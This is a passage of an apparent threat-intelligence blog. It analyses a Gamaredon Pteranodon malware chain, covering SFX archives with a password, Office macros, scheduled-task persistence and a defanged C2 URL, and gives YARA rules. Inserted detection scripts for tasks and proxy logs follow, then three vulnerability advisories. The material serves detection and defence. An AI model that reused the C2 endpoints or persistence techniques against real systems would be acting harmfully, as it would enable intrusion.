Threat: Gamaredon Pteranodon implant SFX archive
Brief Description: SFX Archive First Stage
Ssdeep: 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv:zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv

Table 3. Information about first SFX archive

Simply opening the SFX archive reveals two different files, shown below, named “8957.cmd” and “28847” respectively.

Figure 7. Content of the Gamaredon Pteranodon SFX archive

When executed, the SFX archive extracts its contents and runs “8957.cmd”. The batch script looks like the following screenshot:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions in an attempt to make the analysis harder. Cleaning the script, we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file to “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as the password, and renames the file contained inside “28847.exe” to “WuaucltIC.exe”. Finally, it runs this file with “-post.php” as its argument.

The fact that “28847.exe” can be opened this way tells us that the “28847” file is another SFX archive. Some static information about it:

Hash: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1
Threat: Gamaredon Pteranodon implant SFX archive
Brief Description: SFX Archive Second Stage
Ssdeep: 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM:OoZwxVvfoaPu

Table 4. Information about the second SFX archive

Exploring it, several files can be seen inside, including the “6323” file. The following figure shows the complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legitimate DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro scripts, described next. Static analysis of the “6323” file reveals its nature: it is written with Microsoft Visual Studio .NET and is therefore easy to reverse. Before reversing the executable, it is possible to clean it, reducing both its size and the number of junk instructions inside the code. The image below shows information about the sample before and after the cleaning.

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the number of arguments is zero, the malware terminates. After that, the malware checks for the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path from which it is executed: if they exist, it reads their contents, otherwise it exits.

Figure 13. Function used by the .NET sample to check the presence of the “WordMacros.txt” and “ExcelMyMacros.txt” files

Part of the content of the variable “xVGlMEP”:

Figure 14. Piece of the “WordMacros.txt” code

There is only a slight difference between the two files.

Figure 15. Difference between the “WordMacros.txt” and “ExcelMyMacros.txt” files

As visible in the previous figure, the only differences between the files are the variable, the registry key and the path used by Word rather than by Excel. Finally, the macros are executed through the Office engine, as in the following figure.

Figure 16. Winword with malicious macro

So let’s start dissecting the macros. For better comprehension we will consider only one of them, specifically the “wordMacros.txt” macro. First of all, the macro sets the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\" and then sets up two scheduled tasks that start every 12 and 15 minutes respectively: the first one runs “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one runs “IndexOffice.exe” in the same path.

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware writes the “IndexOffice.txt” file into the “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been described so far:

Figure 18. Part of “IndexOffice.txt” file
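The persistence described above (tasks running IndexOffice.vbs and IndexOffice.exe from the roaming Office folder every 12 and 15 minutes) can be hunted for in a scheduled-task export. The following Python is an added example, not code from the original analysis; the task names and the CSV sample are constructed, and the column headers are assumed to be those printed by `schtasks /query /v /fo csv`.

```python
import csv
import io
import re

# Traits from the analysis: %APPDATA%\Microsoft\Office\IndexOffice.vbs and
# IndexOffice.exe launched by two tasks repeating every 12 and 15 minutes.
TASK_TARGET = re.compile(r"\\Microsoft\\Office\\IndexOffice\.(vbs|exe)\b", re.IGNORECASE)
REPEAT_MINUTES = re.compile(r"(\d+)\s*Minute", re.IGNORECASE)


def suspicious_tasks(schtasks_csv: str):
    """Return rows whose 'Task To Run' points at the IndexOffice artifacts,
    with the repeat interval parsed in minutes (None if not repeating)."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        action = row.get("Task To Run", "")
        if not TASK_TARGET.search(action):
            continue
        m = REPEAT_MINUTES.search(row.get("Repeat: Every", ""))
        findings.append({
            "task": row.get("TaskName", ""),
            "action": action,
            "every_min": int(m.group(1)) if m else None,
            "user": row.get("Run As User", ""),
        })
    return findings


# Constructed sample export (assumed header names; a subset of the verbose
# schtasks columns). Task names and host are invented for illustration.
SAMPLE_CSV = '''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$","SYSTEM","Weekly","Disabled"
"WS01","\\IndexOffice","wscript.exe C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Office\\IndexOffice.vbs","admin","One Time Only","0 Hour(s), 12 Minute(s)"
"WS01","\\IndexOfficeExe","C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Office\\IndexOffice.exe","admin","One Time Only","0 Hour(s), 15 Minute(s)"
'''

if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_CSV):
        print(f"[!] {f['task']} every {f['every_min']} min as {f['user']}: {f['action']}")
```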

The script checks for the presence of the “IndexOffice.exe” artifact: if present, it deletes it and downloads a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”.
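Both beacon URLs seen in this chain (the “templates.vbs” request to autoindex.php and the IndexOffice request to post.php) carry the same victim identifier, `<PC_Name>_<Hex_Drive_SN>`, in the path, which makes them easy to hunt for in web proxy logs. The following Python is an added example, not code from the original analysis; it assumes a simplified squid-style log layout with constructed sample lines, and treats the identifier as a NetBIOS-style name followed by an 8-hex-digit volume serial.

```python
import re
from typing import Optional

# Beacon path shape from the analysis:
#   /<PC_NAME>_<HEX_DRIVE_SN>//autoindex.php   (first stage, get-icons.ddns.net)
#   /<PC_NAME>_<HEX_DRIVE_SN>/post.php         (IndexOffice stage, masseffect.space)
# The serial is the volume serial number as 8 hex digits (e.g. E42CAF54); the
# 15-character NetBIOS-style host name is an assumption of this example.
BEACON_PATH = re.compile(
    r"^/(?P<host>[A-Za-z0-9][A-Za-z0-9\-]{0,14})_(?P<serial>[0-9A-Fa-f]{8})"
    r"//?(?P<script>autoindex|post)\.php$"
)


def parse_beacon(url: str) -> Optional[dict]:
    """Return domain, victim host name, drive serial and stage script if the
    URL matches the beacon shape, otherwise None."""
    m = re.match(r"^https?://(?P<domain>[^/]+)(?P<path>/.*)$", url)
    if not m:
        return None
    p = BEACON_PATH.match(m.group("path"))
    if not p:
        return None
    return {
        "domain": m.group("domain").lower(),
        "host": p.group("host"),
        "serial": p.group("serial").upper(),
        "script": p.group("script"),
    }


def scan_proxy_log(lines):
    """Return (client_ip, beacon) pairs for lines whose URL matches.
    Assumed field order: timestamp client_ip method url status."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        found = parse_beacon(parts[3])
        if found:
            hits.append((parts[1], found))
    return hits


# Constructed sample log lines (not from the original analysis).
SAMPLE_LOG = [
    "1581670000.123 10.0.0.17 GET http://get-icons.ddns.net/ADMIN-PC_E42CAF54//autoindex.php 200",
    "1581670010.456 10.0.0.17 GET http://www.example.com/index.html 200",
    "1581671200.789 10.0.0.23 GET http://masseffect.space/WS-FIN01_1A2B3C4D/post.php 403",
    "1581671300.000 10.0.0.23 GET http://masseffect.space/about/post.php 200",
]

if __name__ == "__main__":
    for ip, b in scan_proxy_log(SAMPLE_LOG):
        print(f"{ip} -> {b['domain']} host={b['host']} serial={b['serial']} stage={b['script']}")
```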

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response, encoding it with the Encode function. This function accepts three parameters: the input file, the output file and arrKey; arrKey is computed by the GetKey function, which takes as input the hexadecimal value of the serial number of the drive installed on the machine and returns the key. Part of the Encode function and the complete code of the GetKey function are shown below.

Figure 20. Encode function 

Figure 21. Function GetKey

Visiting the web page of the C2 returns a “Forbidden” message, meaning that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 

Conclusion

Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the group has remained almost identical over the years.

The massive use of weaponized Office documents, Office template injection, SFX archives, WMI and VBA macro stages that change dynamically makes the Pterodon attack chain very malleable and adaptive. However, the introduction of a .NET component is a novelty compared to previous Pterodon samples.

Indicators of Compromise

Hashes

Persistence

URL

C2

Yara Rule

rule Gamaredon_Campaign_Genuary_2020_Initial_Dropper {
    meta:
        description = "Yara Rule for Gamaredon_f_doc"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2020-02-14"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = { 4B 03 }
        $a2 = { 8E DA 30 14 DD 57 EA 3F }
        $a3 = { 3B 93 46 0F AF B0 2B 33 }
        $a4 = { 50 4B 03 04 14 00 06 00 08 }

    condition:
        all of them
}

rule Gamaredon_Campaign_Genuary_2020_Second_Stage {
    meta:
        description = "Yara Rule for Gamaredon_apu_dot"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2020-02-14"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = "Menu\\Programs\\Startup\\\""
        $a2 = "RandStrinh"
        $a3 = ".txt"
        $a4 = "templates.vbs"
        $a5 = "GET"
        $a6 = "Encode = 1032"
        $a7 = "WShell=CreateObject(\"WScript.Shell\")"
        $a8 = "Security"
        $a9 = "AtEndOfStream"
        $a10 = "GenRandom"
        $a11 = "SaveToFile"
        $a12 = "Sleep"
        $a13 = "WinMgmts:{(Shutdown,RemoteShutdown)}!"
        $a14 = "Scripting"
        $a15 = "//autoindex.php"

    condition:
        11 of ($a*)
}

rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_1 {
    meta:
        description = "Yara Rule for Gamaredon SFX stage 1"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2020-02-14"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = { 4D 5A }
        $a2 = { FF 75 FC E8 F2 22 01 00 }
        $a3 = { FE DE DB DB FE D5 D5 D6 F8 }
        $a4 = { 22 C6 24 A8 BE 81 DE 63 }
        $a5 = { CF 4F D0 C3 C0 91 B0 0D }

    condition:
        all of them
}

rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_2 {
    meta:
        description = "Yara Rule for Gamaredon SFX stage 2"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2020-02-14"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = { 4D 5A }
        $a2 = { 00 E9 07 D4 FD FF 8B 4D F0 81 }
        $a3 = { B7 AB FE B2 B1 B5 FA 9B 11 80 }
        $a4 = { 81 21 25 E0 38 03 FA F0 AF 11 }
        $a5 = { 0A 39 DF F7 40 8D 7B 44 52 }

    condition:
        all of them
}

rule Gamaredon_Campaign_Genuary_2020_dot_NET_stage {
    meta:
        description = "Yara Rule for Gamaredon dot NET stage"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2020-02-14"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = { 4D 5A }
        $a2 = "AssemblyCompanyAttribute"
        $a3 = "GetDrives"
        $a4 = "Aversome"
        $a5 = "TotalMilliseconds"
        $s1 = { 31 01 C6 01 F2 00 29 01 5C 03 76 }
        $s2 = { 79 02 38 03 93 03 B5 03 }
        $s3 = { 00 07 00 00 11 00 00 72 01 }
        $s4 = { CD DF A6 EF 66 0E 44 D7 }

    condition:
        all of ($a*) and 2 of ($s*)
}

This blog post was authored by Davide Testa, Luigi Martire and Antonio Pirozzi of Cybaze-Yoroi ZLAB.

Serious Vulnerabilities in Microsoft Exchange

Proto: N030220.

With this notice Yoroi wishes to inform you about the recent discovery of serious vulnerabilities in Exchange Server, Microsoft's well-known e-mail management solution, widely deployed both in Enterprise environments and in SMBs. Specifically, the vulnerabilities are tracked with the identifiers CVE-2020-0692 and CVE-2020-0688.

The issues relate to two different features within the Exchange mail services:

Figure. Exposure of Exchange mail services in Italy (Source: ShodanHQ)

The vulnerabilities have been confirmed by the Vendor in the February 2020 Security Updates, where the affected versions are listed as:

Given the nature of the affected services, their exposure to the Internet, and the imminent release of technical details announced by the ZDI program, Yoroi strongly recommends planning the application of the software updates on the Microsoft Exchange mail services in use within your infrastructures.

Finally, Yoroi recommends keeping users' awareness high, periodically warning them about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Important Vulnerabilities in Multiple Cisco Devices

Proto: N020220.

With this notice Yoroi wishes to inform you about the discovery of serious vulnerabilities in multiple Cisco technologies, including several families of network switches, security appliances, VoIP telephony and video surveillance devices. The issues are known under the alias “CDPwn” and are referenced by the identifiers CVE-2020-3119, CVE-2020-3118, CVE-2020-3111, CVE-2020-3110 and CVE-2020-3120.

Although the issues affect various types of devices, they share a common origin, lying in several flaws in the handling and processing of Cisco Discovery Protocol (CDP) packets, a Layer-2 network protocol that Cisco devices are able to handle. These flaws can be exploited by network attackers in various scenarios, for example in the case of:

Cisco has confirmed the issues with the advisories CISCO-SA-20200205-FXNXOS-IOSXR-CDP-DOS, CISCO-SA-20200205-NXOS-CDP-RCE, CISCO-SA-20200205-IOSXR-CDP-RCE, CISCO-SA-20200205-VOIP-PHONES-RCE-DOS and CISCO-SA-20200205-IPCAMERAS-RCE-DOS, where it has released firmware updates for the product families:

Given the potential criticality and the widespread deployment of the affected devices, and the release of technical details about the vulnerabilities, Yoroi recommends planning the application of the firmware updates made available by the Vendor.

Finally, Yoroi recommends keeping users' awareness high, periodically warning them about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Important Vulnerability in TeamViewer

Proto: N010220.

With this notice Yoroi wishes to inform you about a vulnerability within TeamViewer, a remote administration and remote access solution widespread in various SMB and Enterprise environments. The issue is tracked with the identifier CVE-2019-18988.

Independent researchers have discovered a significant flaw in how the credentials used by the remote assistance service are stored: they are not protected by hashing. An attacker with access to a PC running one of the vulnerable TeamViewer versions can obtain administrative privileges and recover the passwords used by the remote access service, which could potentially be used to establish administrative sessions on the other network hosts running TeamViewer instances.

Based on the information gathered, the Vendor has been aware of the situation for more than 90 days, but no security advisories have been released yet. The researchers have verified the issue for TeamViewer versions 7 through 14; it is not currently confirmed whether version 15 is affected.

Considering the potential spread of the software within corporate IT fleets, the availability of technical details and attack tools, and the existence of organized APT groups that exploit TeamViewer credentials precisely to propagate within networks (e.g. APT-41), Yoroi recommends monitoring the release of security updates for TeamViewer and, in the meantime, evaluating disabling the automatic start of the remote access services (the “TeamViewer<VERSION>” services) and limiting the reuse of TeamViewer passwords.

Finally, Yoroi recommends keeping users' awareness high, periodically warning them about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index